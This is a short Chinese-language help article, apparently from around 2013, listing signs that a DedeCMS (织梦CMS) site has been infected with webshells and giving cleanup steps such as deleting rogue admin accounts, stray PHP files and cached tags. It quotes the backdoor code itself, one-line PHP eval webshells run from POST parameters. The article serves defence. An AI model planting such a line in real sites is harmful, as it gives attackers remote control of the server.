织梦CMS被挂马特征汇总

一、织梦CMS被挂马特征汇总

2013织梦CMS被挂马特征汇总。最近很多朋友反应后台多了几个系统管理员用户：service、spider等，而且自己之前的管理员用户登陆 时候会提示用户名不存在。还有朋友的织梦CMS网站里出现asdd、90sec、service等PHP格式的非DedeCMS源文件，这些木马文件内容 一般为:

<?php eval($_POST[guige]);?>或者：<?php eval($_POST[fuwu]);?>

等等，被挂马后网站根目录下会生成一堆赌博网页等。

二、织梦CMS被挂马清理方法

1、删除增加的管理员service、spider等用户名。

2、删除根目录的asdd、90sec、service等PHP文件。

3、删除plus目录的以下可疑文件：

　　download.php　　mytag_js.php　　90sec.php　　service.php　　vliw.php

　　vuew.php　　digg.php　　xiao.php　　bakup.php等非dedecms程序文件

4、织梦程序后台扫描提示名字为90sec的PHP文件，可以在后台->模板->自定义宏标记中删除其中的条目之后可以升级下include目录里的名为dedesql.class的PHP文件即可。

5、给plus只读权限。

6、删除data/cache文件夹下类似mytag-xxx名字的htm文件，删除tplcache的缓存文件。

7、数据库要清空dede_mytag表。

当然，最好备份数据，保险起见，重装DEDECMS程序，仅供参考！